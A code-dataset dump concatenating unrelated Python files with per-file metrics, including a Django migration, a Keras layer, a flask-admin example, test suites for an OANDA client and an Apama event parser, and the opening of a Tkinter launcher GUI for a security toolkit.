(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('likes', self.gf('django.db.models.fields.IntegerField')(default=0)),
('ratings', self.gf('django.db.models.fields.IntegerField')(default=0)),
('rating_5_count', self.gf('django.db.models.fields.IntegerField')(default=0)),
('rating_4_count', self.gf('django.db.models.fields.IntegerField')(default=0)),
('rating_3_count', self.gf('django.db.models.fields.IntegerField')(default=0)),
('rating_2_count', self.gf('django.db.models.fields.IntegerField')(default=0)),
('rating_1_count', self.gf('django.db.models.fields.IntegerField')(default=0)),
('rating', self.gf('django.db.models.fields.DecimalField')(default=0, max_digits=2, decimal_places=1)),
('favorite_marks', self.gf('django.db.models.fields.IntegerField')(default=0)),
('shares', self.gf('django.db.models.fields.IntegerField')(default=0)),
('denounces', self.gf('django.db.models.fields.IntegerField')(default=0)),
('visits', self.gf('django.db.models.fields.IntegerField')(default=0)),
('content_type', self.gf('django.db.models.fields.related.ForeignKey')(related_name='content_type_set_for_stats', to=orm['contenttypes.ContentType'])),
('object_pk', self.gf('django.db.models.fields.IntegerField')()),
))
db.send_create_signal(u'content_interactions_stats', ['Stats'])
# Adding unique constraint on 'Stats', fields ['content_type', 'object_pk']
db.create_unique(u'content_interactions_stats_stats', ['content_type_id', 'object_pk'])
def backwards(self, orm):
# Removing unique constraint on 'Stats', fields ['content_type', 'object_pk']
db.delete_unique(u'content_interactions_stats_stats', ['content_type_id', 'object_pk'])
# Deleting model 'Stats'
db.delete_table(u'content_interactions_stats_stats')
models = {
u'content_interactions_stats.stats': {
'Meta': {'unique_together': "(('content_type', 'object_pk'),)", 'object_name': 'Stats'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'content_type_set_for_stats'", 'to': u"orm['contenttypes.ContentType']"}),
'denounces': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'favorite_marks': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'likes': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'object_pk': ('django.db.models.fields.IntegerField', [], {}),
'rating': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '2', 'decimal_places': '1'}),
'rating_1_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'rating_2_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'rating_3_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'rating_4_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'rating_5_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'ratings': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'shares': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'visits': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['content_interactions_stats'] | 64.338028 | 171 | 0.619527 | 521 | 4,568 | 5.253359 | 0.166987 | 0.102302 | 0.173913 | 0.248447 | 0.758129 | 0.724516 | 0.692364 | 0.649251 | 0.516989 | 0.411765 | 0 | 0.013018 | 0.176007 | 4,568 | 71 | 172 | 64.338028 | 0.714134 | 0.047067 | 0 | 0.035714 | 0 | 0 | 0.531739 | 0.364305 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.071429 | 0 | 0.160714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
787ee1d9853b359fa3bd7f67f45bcdbbd1b42170 | 355 | py | Python | dnevnik/__init__.py | IvanProgramming/dnevnik_mos_ru | 303b119115b3b88b330e2b7cc512c7a447ce5da0 | [
"MIT"
] | 19 | 2020-11-21T15:29:11.000Z | 2022-03-18T16:16:03.000Z | dnevnik/__init__.py | RedGuys/dnevnik_mos_ru | 303b119115b3b88b330e2b7cc512c7a447ce5da0 | [
"MIT"
] | 1 | 2020-12-03T22:25:15.000Z | 2020-12-29T11:23:28.000Z | dnevnik/__init__.py | RedGuys/dnevnik_mos_ru | 303b119115b3b88b330e2b7cc512c7a447ce5da0 | [
"MIT"
] | 9 | 2020-12-09T13:02:24.000Z | 2022-02-07T18:19:32.000Z | __version__ = "2.3.0"
from .school import School
from .class_unit import ClassUnit
from .group import Group
from .teacher import Teacher
from .student_profile import StudentProfile
from .client import Client
from .academic_years import AcademicYear
from .auth_providers import *
from .exceptions import *
from .base_auth_provider import BaseAuthProvider
| 27.307692 | 48 | 0.828169 | 48 | 355 | 5.916667 | 0.520833 | 0.070423 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009646 | 0.123944 | 355 | 12 | 49 | 29.583333 | 0.903537 | 0 | 0 | 0 | 0 | 0 | 0.014085 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.909091 | 0 | 0.909091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
7883b4489468fd1015af7a4b0a88ce8710f26385 | 473 | py | Python | test_two/test.py | greatfirsty/hellopython | f12aacf36b8f208d6c5622ffd6b4c1927f37b45a | [
"Apache-2.0"
] | 1 | 2019-05-04T01:25:43.000Z | 2019-05-04T01:25:43.000Z | test_two/test.py | greatfirsty/hellopython | f12aacf36b8f208d6c5622ffd6b4c1927f37b45a | [
"Apache-2.0"
] | null | null | null | test_two/test.py | greatfirsty/hellopython | f12aacf36b8f208d6c5622ffd6b4c1927f37b45a | [
"Apache-2.0"
] | null | null | null | import unittest
class My_test(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
    @unittest.skip('skip this test unconditionally')
def test_skip(self):
print('test skip!')
    @unittest.skipIf(3 > 2, 'skip the test when the condition is True')
def test_skip_if(self):
print('the condition if ,test skip')
    @unittest.skipUnless(3 > 2, 'run the test only when the condition is True')
    def test_skip_unless(self):
        print('condition is true, running the test')
if __name__ == '__main__':
unittest.main() | 24.894737 | 45 | 0.630021 | 61 | 473 | 4.655738 | 0.459016 | 0.140845 | 0.116197 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010989 | 0.230444 | 473 | 19 | 46 | 24.894737 | 0.769231 | 0 | 0 | 0.117647 | 0 | 0 | 0.185654 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.294118 | false | 0.117647 | 0.058824 | 0 | 0.411765 | 0.176471 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
78a67ba5096ebf53d533be3eb20497845483335a | 3,225 | py | Python | deep_qa/layers/backend/collapse_to_batch.py | richarajpal/deep_qa | d918335a1bed71b9cfccf1d5743321cee9c61952 | [
"Apache-2.0"
] | 459 | 2017-02-08T13:40:17.000Z | 2021-12-12T12:57:48.000Z | deep_qa/layers/backend/collapse_to_batch.py | nelson-liu/deep_qa | 00d36306759cb1c232489f68844371fb727ce2c8 | [
"Apache-2.0"
] | 176 | 2017-01-26T01:19:41.000Z | 2018-04-22T19:16:01.000Z | deep_qa/layers/backend/collapse_to_batch.py | nelson-liu/deep_qa | 00d36306759cb1c232489f68844371fb727ce2c8 | [
"Apache-2.0"
] | 154 | 2017-01-26T01:00:30.000Z | 2021-02-05T10:44:42.000Z | from keras import backend as K
from overrides import overrides
from ..masked_layer import MaskedLayer
class CollapseToBatch(MaskedLayer):
"""
Reshapes a higher order tensor, taking the first ``num_to_collapse`` dimensions after the batch
dimension and folding them into the batch dimension. For example, a tensor of shape (2, 4, 5,
3), collapsed with ``num_to_collapse = 2``, would become a tensor of shape (40, 3). We perform
identical computation on the input mask, if there is one.
This is essentially what Keras' ``TimeDistributed`` layer does (and then undoes) to apply a
layer to a higher-order tensor, and that's the intended use for this layer. However,
``TimeDistributed`` cannot handle distributing across dimensions with unknown lengths at graph
compilation time. This layer works even in that case. So, if your actual tensor shape at
graph compilation time looks like (None, None, None, 3), or (None, 4, None, 3), you can still
use this layer (and :class:`~deep_qa.layers.backend.expand_from_batch.ExpandFromBatch`) to get
the same result as ``TimeDistributed``. If your shapes are fully known at graph compilation
time, just use ``TimeDistributed``, as it's a nicer API for the same functionality.
Inputs:
- tensor with ``ndim >= 3``
Output:
- tensor with ``ndim = input_ndim - num_to_collapse``, with the removed dimensions folded
into the first (batch-size) dimension
Parameters
----------
num_to_collapse: int
The number of dimensions to fold into the batch size.
"""
def __init__(self, num_to_collapse: int, **kwargs):
self.num_to_collapse = num_to_collapse
super(CollapseToBatch, self).__init__(**kwargs)
@overrides
def call(self, inputs, mask=None):
return self.__collapse_tensor(inputs)
@overrides
def compute_mask(self, inputs, mask=None):
# pylint: disable=unused-argument
if mask is None:
return None
return self.__collapse_tensor(mask)
@overrides
def compute_output_shape(self, input_shape):
return (None,) + input_shape[1 + self.num_to_collapse:]
@overrides
def get_config(self):
base_config = super(CollapseToBatch, self).get_config()
config = {'num_to_collapse': self.num_to_collapse}
config.update(base_config)
return config
def __collapse_tensor(self, tensor):
# If we were to call K.int_shape(inputs), we would get something back that has None in it
# (other than the batch dimension), because the shape is not fully known at graph
# compilation time. We can't do a reshape with more than one unknown dimension, which is
# why we're doing this whole layer in the first place instead of just using
# TimeDistributed. tf.reshape will let us pass in a tensor that has the shape, instead of
# just some ints. So we can use tf.shape(tensor) to get the actual runtime shape of the
# tensor _as a tensor_, which we then pass to tf.reshape().
new_shape = K.concatenate([[-1], K.shape(tensor)[1 + self.num_to_collapse:]], 0)
return K.reshape(tensor, new_shape)
| 45.422535 | 99 | 0.690543 | 466 | 3,225 | 4.654506 | 0.356223 | 0.025357 | 0.065929 | 0.039189 | 0.071923 | 0.029507 | 0 | 0 | 0 | 0 | 0 | 0.006439 | 0.229457 | 3,225 | 70 | 100 | 46.071429 | 0.866398 | 0.608372 | 0 | 0.148148 | 0 | 0 | 0.012931 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.111111 | 0.074074 | 0.592593 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
78adbe2a86608537edf115c5f7387eaafc400ee7 | 2,891 | py | Python | example/declarative/custom_form.py | wilsaj/flask-admin-old | aab2fe94e0641932ebd1c8f8dc500ba2daf5731c | [
"MIT"
] | 2 | 2016-03-01T22:15:39.000Z | 2016-07-17T18:10:19.000Z | example/declarative/custom_form.py | wilsaj/flask-admin-old | aab2fe94e0641932ebd1c8f8dc500ba2daf5731c | [
"MIT"
] | null | null | null | example/declarative/custom_form.py | wilsaj/flask-admin-old | aab2fe94e0641932ebd1c8f8dc500ba2daf5731c | [
"MIT"
] | null | null | null | import sys
from flask import Flask, redirect
from flask.ext import admin
from flask.ext.admin.datastore.sqlalchemy import SQLAlchemyDatastore
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Boolean, Column, Integer, Text, String, Float, Time
from sqlalchemy.orm import synonym
from werkzeug import check_password_hash, generate_password_hash
from wtforms import Form, validators
from wtforms.fields import BooleanField, TextField, PasswordField
Base = declarative_base()
class User(Base):
__tablename__ = 'user'
id = Column(Integer, primary_key=True)
username = Column(String(80), unique=True)
_password_hash = Column('password', String(80), nullable=False)
is_active = Column(Boolean, default=True)
def __init__(self, username="", password="", is_active=True):
self.username = username
self.password = password
self.is_active = is_active
def check_password(self, password):
        return check_password_hash(self._password_hash, password)
@property
def password(self):
return self._password_hash
@password.setter
def password(self, password):
self._password_hash = generate_password_hash(password)
password = synonym('_password_hash', descriptor=password)
def __repr__(self):
return self.username
__mapper_args__ = {
'order_by': username
}
class UserForm(Form):
"""
    Form for creating or editing a User object (via the admin). Define
any handling of fields here. This form class also has precedence
when rendering forms to a webpage, so the model-generated fields
will come after it.
"""
username = TextField(u'User name',
[validators.required(), validators.length(max=80)])
password = PasswordField('Change Password',
[validators.optional(),
validators.equal_to('confirm_password')])
confirm_password = PasswordField()
is_active = BooleanField(default=True)
def create_app(database_uri='sqlite://'):
app = Flask(__name__)
app.config['SECRET_KEY'] = 'not secure'
engine = create_engine(database_uri, convert_unicode=True)
db_session = scoped_session(sessionmaker(
autocommit=False, autoflush=False,
bind=engine))
datastore = SQLAlchemyDatastore(
(User,), db_session, model_forms={'User': UserForm})
admin_blueprint = admin.create_admin_blueprint(
datastore)
app.register_blueprint(admin_blueprint, url_prefix='/admin')
Base.metadata.create_all(bind=engine)
@app.route('/')
def go_to_admin():
return redirect('/admin')
return app
if __name__ == '__main__':
app = create_app('sqlite:///simple.db')
app.run(debug=True)
| 31.086022 | 76 | 0.697682 | 337 | 2,891 | 5.744807 | 0.391691 | 0.049587 | 0.030992 | 0.02376 | 0.033058 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00262 | 0.207887 | 2,891 | 92 | 77 | 31.423913 | 0.842795 | 0.074369 | 0 | 0 | 0 | 0 | 0.055514 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.107692 | false | 0.246154 | 0.184615 | 0.061538 | 0.569231 | 0.030769 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
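The `User` model above routes assignment through a `password` property so only a hash is ever stored, with `synonym` exposing the column to SQLAlchemy. The property half of that pattern in plain Python (a sketch; `hashlib.sha256` stands in for werkzeug's `generate_password_hash`, which additionally salts and tags the digest):

```python
import hashlib

class PlainUser:
    """Plain-Python stand-in showing the hash-on-assignment property pattern."""

    def __init__(self, password=""):
        self.password = password  # routed through the setter below

    @property
    def password(self):
        return self._password_hash

    @password.setter
    def password(self, raw):
        # Store only a digest, never the plaintext.
        self._password_hash = hashlib.sha256(raw.encode()).hexdigest()

    def check_password(self, raw):
        return self._password_hash == hashlib.sha256(raw.encode()).hexdigest()

u = PlainUser("secret")
print(u.check_password("secret"))  # True
```

Because `__init__` assigns through the setter, no code path ever stores the raw password on the instance.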
78afe69271dcc19c401da576fa437b2d4d8ccb57 | 2,351 | py | Python | pyoanda/tests/test_order.py | toloco/pyoanda | 26b3f28a89d07c5c20d2a645884505387f1daae8 | [
"MIT"
] | 81 | 2015-03-18T23:02:33.000Z | 2021-07-13T15:00:14.000Z | pyoanda/tests/test_order.py | toloco/pyoanda | 26b3f28a89d07c5c20d2a645884505387f1daae8 | [
"MIT"
] | 32 | 2015-04-18T22:04:00.000Z | 2019-02-28T00:58:39.000Z | pyoanda/tests/test_order.py | toloco/pyoanda | 26b3f28a89d07c5c20d2a645884505387f1daae8 | [
"MIT"
] | 32 | 2015-04-06T16:42:07.000Z | 2018-02-13T19:06:19.000Z | from datetime import datetime
try:
import unittest2 as unittest
except ImportError:
import unittest
from ..order import Order
class OrderClassTest(unittest.TestCase):
def fail(self, order):
with self.assertRaises(TypeError):
assert order.check()
def test_creation(self):
order = Order(
instrument="GBP_EUR",
units=11,
side="buy",
type="market"
)
assert order.check()
def test_creation_bad_param(self):
order = Order(
instrument="GBP_EUR",
units=11,
side="buy",
type="market",
bad="param"
)
self.fail(order)
def test_creation_bad_units(self):
order = Order(
instrument="GBP_EUR",
units="bad",
side="buy",
type="market"
)
self.fail(order)
def test_creation_bad_side(self):
order = Order(
instrument="GBP_EUR",
units=1,
side="bad",
type="market"
)
self.fail(order)
def test_creation_bad_type(self):
order = Order(
instrument="GBP_EUR",
units=1,
side="sell",
type="bad"
)
self.fail(order)
def test_creation_with_type(self):
order = Order(
instrument="GBP_EUR",
units=1,
side="sell",
type="limit",
price=10.0,
expiry=datetime.now()
)
assert order.check()
def test_creation_with_type_error(self):
order = Order(
instrument="GBP_EUR",
units=1,
side="sell",
type="limit",
price=10.0,
)
self.fail(order)
def test_creation_bad_expiry(self):
order = Order(
instrument="GBP_EUR",
units=1,
side="sell",
type="limit",
price=10.0,
expiry="datetime.now()"
)
self.fail(order)
def test_creation_bad_price(self):
order = Order(
instrument="GBP_EUR",
units=1,
side="sell",
type="limit",
price="10.0",
expiry=datetime.now()
)
assert order.check()
| 22.605769 | 44 | 0.482773 | 234 | 2,351 | 4.700855 | 0.183761 | 0.081818 | 0.122727 | 0.196364 | 0.78 | 0.769091 | 0.673636 | 0.557273 | 0.557273 | 0.446364 | 0 | 0.016547 | 0.408762 | 2,351 | 103 | 45 | 22.825243 | 0.77482 | 0 | 0 | 0.622222 | 0 | 0 | 0.071459 | 0 | 0 | 0 | 0 | 0 | 0.055556 | 1 | 0.111111 | false | 0 | 0.055556 | 0 | 0.177778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
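The tests above expect `Order.check()` to return truthily for well-formed orders and raise `TypeError` otherwise. A hypothetical validator in that spirit (not pyoanda's actual implementation, which also rejects unexpected keyword arguments, as `test_creation_bad_param` shows):

```python
from datetime import datetime

class SimpleOrder:
    """Sketch of an order whose check() raises TypeError on bad field values."""

    SIDES = {"buy", "sell"}
    TYPES = {"market", "limit"}

    def __init__(self, instrument, units, side, type, price=None, expiry=None):
        self.instrument = instrument
        self.units = units
        self.side = side
        self.type = type
        self.price = price
        self.expiry = expiry

    def check(self):
        # Mirror the behaviour the tests exercise: invalid values raise.
        if not isinstance(self.units, int):
            raise TypeError("units must be an int")
        if self.side not in self.SIDES:
            raise TypeError("side must be 'buy' or 'sell'")
        if self.type not in self.TYPES:
            raise TypeError("unsupported order type")
        if self.type == "limit":
            if self.price is None:
                raise TypeError("limit orders need a price")
            if not isinstance(self.expiry, datetime):
                raise TypeError("limit orders need a datetime expiry")
        return True
```

Usage matches the test fixtures, e.g. `SimpleOrder("GBP_EUR", 11, "buy", "market").check()`.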
78b18630fc1ece77e77833d5d3ab0f8dbb770586 | 7,972 | py | Python | tests/test_eventparser.py | DanskeBank/apamaeventparser | 40767140faa8bd5a4ae134162e0e0c10457786f7 | [
"MIT"
] | 3 | 2017-03-03T22:14:51.000Z | 2021-02-03T03:01:03.000Z | tests/test_eventparser.py | DanskeBank/apamaeventparser | 40767140faa8bd5a4ae134162e0e0c10457786f7 | [
"MIT"
] | null | null | null | tests/test_eventparser.py | DanskeBank/apamaeventparser | 40767140faa8bd5a4ae134162e0e0c10457786f7 | [
"MIT"
] | 1 | 2016-10-10T10:52:38.000Z | 2016-10-10T10:52:38.000Z | import unittest
from apamaeventparser.apamaevent import ApamaEvent
from apamaeventparser.eventparser import parse, _tokenize, _channel, _package_name, _event_name, _event_body, _sequence, _dictionary
class TestEvents(unittest.TestCase):
def test_no_event(self):
expected_event = None
parsed_event = parse('')
self.assertEqual(parsed_event, expected_event)
def test_simple_event(self):
expected_event = ApamaEvent(event_name='a')
parsed_event = parse('a()')
self.assertEqual(parsed_event, expected_event)
def test_package_one_level(self):
expected_event = ApamaEvent(package_name='heimdall', event_name='ragnarok')
parsed_event = parse('heimdall.ragnarok()')
self.assertEqual(parsed_event, expected_event)
def test_package_two_levels(self):
expected_event = ApamaEvent(package_name='heimdall.horn', event_name='ragnarok')
parsed_event = parse('heimdall.horn.ragnarok()')
self.assertEqual(parsed_event, expected_event)
def test_package_many_levels(self):
expected_event = ApamaEvent(package_name='heimdall.guard.rainbow.bridge.blow.horn', event_name='ragnarok')
parsed_event = parse('heimdall.guard.rainbow.bridge.blow.horn.ragnarok()')
self.assertEqual(parsed_event, expected_event)
def test_simple_fields(self):
expected_event = ApamaEvent(package_name='heimdall.horn',
event_name='ragnarok',
fields=['valhalla', 1, 3.14, 1.0e6, False, True])
parsed_event = parse('heimdall.horn.ragnarok("valhalla", 1, 3.14, 1.0e6, false, true)')
self.assertEqual(parsed_event, expected_event)
def test_channel(self):
expected_event = ApamaEvent(channel='channel',
package_name='heimdall.horn',
event_name='ragnarok',
fields=['valhalla', 1, 3.14, 1.0e6, False, True])
parsed_event = parse('"channel",heimdall.horn.ragnarok("valhalla", 1, 3.14, 1.0e6, false, true)')
self.assertEqual(parsed_event, expected_event)
def test_nested_event(self):
expected_event = ApamaEvent(channel='channel',
package_name='heimdall.horn',
event_name='ragnarok',
fields=[
ApamaEvent(package_name='rainbow.bridge',
event_name='breached',
fields=[True])])
parsed_event = parse('"channel",heimdall.horn.ragnarok(rainbow.bridge.breached(true))')
self.assertEqual(parsed_event, expected_event)
def test_readme_example(self):
expected_event = ApamaEvent(package_name='com.apama',
event_name='Event',
fields=['Field', 1.234, 7, False, ['a', 'b', 'c'], {'key': 'value'}])
parsed_event = parse('com.apama.Event("Field", 1.234, 7, false, ["a","b","c"], {"key": "value"})')
self.assertEqual(parsed_event, expected_event)
class TestEventParts(unittest.TestCase):
def test_channel(self):
expected_result = 'channel'
tokens = _tokenize('"channel",')
parsed_channel = _channel.parse(tokens)
self.assertEqual(parsed_channel, expected_result)
def test_package_name(self):
expected_result = 'heimdall.guard.rainbow.bridge.blow.horn'
tokens = _tokenize('heimdall.guard.rainbow.bridge.blow.horn.')
parsed_package = _package_name.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_event_name(self):
expected_result = 'ragnarok'
tokens = _tokenize('ragnarok')
parsed_package = _event_name.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_event_body_simple_types(self):
expected_result = ['valhalla', 1, 3.14, 1.0e6, True, False]
tokens = _tokenize('("valhalla", 1, 3.14, 1.0e6, true, false)')
parsed_package = _event_body.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_event_body_all_types(self):
expected_result = ['valhalla', 1, 3.14, 1.0e6, True, False, [1, 2, 3, 4],
{'Thor': 'Mjolner', 'Odin': 'Gungnir', 'Freja': 'Falkedragt'}]
tokens = _tokenize('("valhalla", 1, 3.14, 1.0e6, true, false,[1,2,3,4],'
'{"Thor": "Mjolner", "Odin": "Gungnir", "Freja": "Falkedragt"})')
parsed_package = _event_body.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_sequence_string(self):
expected_result = ['a', 'b', 'c']
tokens = _tokenize('["a","b","c"]')
parsed_package = _sequence.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_sequence_numbers(self):
expected_result = [1, 2, 3, 4]
tokens = _tokenize('[1,2,3,4]')
parsed_package = _sequence.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_one_item_sequence(self):
expected_result = ['Thor']
tokens = _tokenize('["Thor"]')
parsed_package = _sequence.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_empty_sequence(self):
expected_result = []
tokens = _tokenize('[]')
parsed_package = _sequence.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_sequence_in_sequence(self):
expected_result = [[1, 2, 3], [4, 5, 6], [7, 8], [9]]
tokens = _tokenize('[[1,2,3],[4,5,6],[7,8],[9]]')
parsed_package = _sequence.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_empty_sequence_in_sequence(self):
expected_result = [[]]
tokens = _tokenize('[[]]')
parsed_package = _sequence.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_sequence_in_sequence_in_sequence(self):
# This is not a legal event type since sequences need to all be the same type, however it still parses...
expected_result = [1, 2, 3, ['a', 'b', 'c'], [['aa', 'bb'], ['cc', 'dd']]]
tokens = _tokenize('[1,2,3,["a","b","c"],[["aa","bb"],["cc","dd"]]]')
parsed_package = _sequence.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_empty_sequence_in_sequence_in_sequence(self):
expected_result = [[[]]]
tokens = _tokenize('[[[]]]')
parsed_package = _sequence.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_empty_dictionary(self):
expected_result = {}
tokens = _tokenize('{}')
parsed_package = _dictionary.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_dictionary(self):
expected_result = {'Thor': 'Mjolner', 'Odin': 'Gungnir', 'Freja': 'Falkedragt'}
tokens = _tokenize('{"Thor": "Mjolner", "Odin": "Gungnir", "Freja": "Falkedragt"}')
parsed_package = _dictionary.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_dictionary_in_dictionary(self):
expected_result = {'other': {},
'Weapons': {'Thor': 'Mjolner', 'Odin': 'Gungnir', 'Freja': 'Falkedragt'},
'Transportation': {'Odin': 'Sleipner', 'Thor': 'Goats'}}
tokens = _tokenize('{"other":{}, '
'"Weapons": {"Thor": "Mjolner", "Odin": "Gungnir", "Freja": "Falkedragt"}, '
'"Transportation": {"Odin": "Sleipner", "Thor": "Goats"}}')
parsed_package = _dictionary.parse(tokens)
self.assertEqual(parsed_package, expected_result)
| 46.348837 | 132 | 0.612017 | 859 | 7,972 | 5.413271 | 0.125728 | 0.096344 | 0.112903 | 0.089462 | 0.792473 | 0.764516 | 0.713978 | 0.679785 | 0.621935 | 0.583441 | 0 | 0.017794 | 0.25276 | 7,972 | 171 | 133 | 46.619883 | 0.7628 | 0.01292 | 0 | 0.342857 | 0 | 0.042857 | 0.175289 | 0.054786 | 0 | 0 | 0 | 0 | 0.178571 | 1 | 0.178571 | false | 0 | 0.021429 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
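The `_channel`/`_package_name`/`_event_name` parsers exercised above split an event string into its parts. As a rough illustration of that split only (the real parser tokenizes and recurses to handle nested events, which a single regex cannot):

```python
import re

EVENT_RE = re.compile(
    r'^(?:"(?P<channel>[^"]*)",)?'   # optional leading "channel",
    r'(?:(?P<package>[\w.]+)\.)?'    # optional dotted package prefix
    r'(?P<name>\w+)'                 # event name
    r'\((?P<body>.*)\)$'             # field list between parentheses
)

def split_event(text):
    # Returns (channel, package, name, body) or None if the shape is wrong.
    m = EVENT_RE.match(text)
    return m and (m.group('channel'), m.group('package'),
                  m.group('name'), m.group('body'))

print(split_event('"channel",heimdall.horn.ragnarok("valhalla", 1)'))
# ('channel', 'heimdall.horn', 'ragnarok', '"valhalla", 1')
```

The greedy `[\w.]+` followed by a literal dot backtracks so the last dotted component becomes the event name, matching what `_package_name` and `_event_name` assert above.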
78c3a132c809348a8e01047019a81ba3d48477aa | 23,329 | py | Python | core/background.py | nkrios/PloitKit | 8fb4d7a84699917dbabcf358650c6a4e043c597f | [
"MIT"
] | 200 | 2017-03-19T15:15:14.000Z | 2022-02-04T21:11:48.000Z | core/background.py | nkrios/PloitKit | 8fb4d7a84699917dbabcf358650c6a4e043c597f | [
"MIT"
] | 17 | 2017-03-20T14:26:54.000Z | 2018-12-04T08:35:45.000Z | core/background.py | nkrios/PloitKit | 8fb4d7a84699917dbabcf358650c6a4e043c597f | [
"MIT"
] | 80 | 2017-03-20T14:06:36.000Z | 2022-01-09T10:18:43.000Z | #! /usr/bin/env python
__author__ = 'Rajesh Majumdar'
try:
from tkinter import *
import tkinter.scrolledtext as sctx
except:
from Tkinter import *
import ScrolledText as sctx
try:
import ttk
except ImportError:
    from tkinter import ttk
import atexit
import os
import sys
from aboutme import aboutme
from contact import contact
from about import about
from licenses import licenses
from updates import checkupdates
from suggestions import suggestions
from contributors import contributions
from checktool import checktool
from mydownloads import mydownloads
from savedownloads import startdownload, savedownloads
from report import report
def hello():
    print('hello world')
def atgexit():
try:
os.remove('mydownloads.txt')
    except OSError:
pass
def mainbody():
root = Tk()
root.geometry("577x556+427+139")
root.title("PloitKit - The Hacker's Toolbox")
root.configure(background="#d9d9d9")
#root.wm_iconbitmap('images/icon.ico')
#root.resizable(0,0)
imagepath = r'images/header.gif'
image = PhotoImage(file=imagepath)
ilabel = Label(root, image = image)
ilabel.image = image
ilabel.pack()
varinfo = StringVar(root, value='Information Gathering')
varvuln = StringVar(root, value="Vulnerability Analysis")
varexploit = StringVar(root, value="Exploitation Tool")
varwireless = StringVar(root, value="Wireless Attacks")
varforensic = StringVar(root, value="Forensics Tools")
varwebapp = StringVar(root, value="Web Application")
varstress = StringVar(root, value="Stress Testing")
varsniff = StringVar(root, value="Sniffing & Spoofing")
